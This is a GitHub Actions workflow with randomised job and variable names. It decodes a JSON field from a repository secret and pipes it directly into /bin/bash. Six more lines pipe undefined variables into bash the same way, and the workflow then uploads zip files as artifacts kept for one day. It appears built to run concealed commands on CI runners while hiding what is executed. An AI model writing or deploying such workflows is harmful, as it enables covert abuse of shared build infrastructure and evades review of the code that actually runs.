name: rebeccacelery9935
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: rebeccacelery9935
        env:
          soo13: ${{ secrets.soo13 }}
        run: |
          printf '%s' "$soo13" | jq -r .zaxcc90015 | /bin/bash
          printf '%s' "$g83" | jq -r .poliw04 | /bin/bash
          echo $xp5191 | jq -r .i6989 | /bin/bash
          echo $ipgj6 | jq -r .qezss3 | /bin/bash
          echo $uvawt929 | jq -r .l90504 | /bin/bash
          echo $fu0 | jq -r .amxii03 | /bin/bash
          echo $osrd948 | jq -r .hcwzt1 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: pySFTuKn
          path: "*.zip"
          retention-days: 1
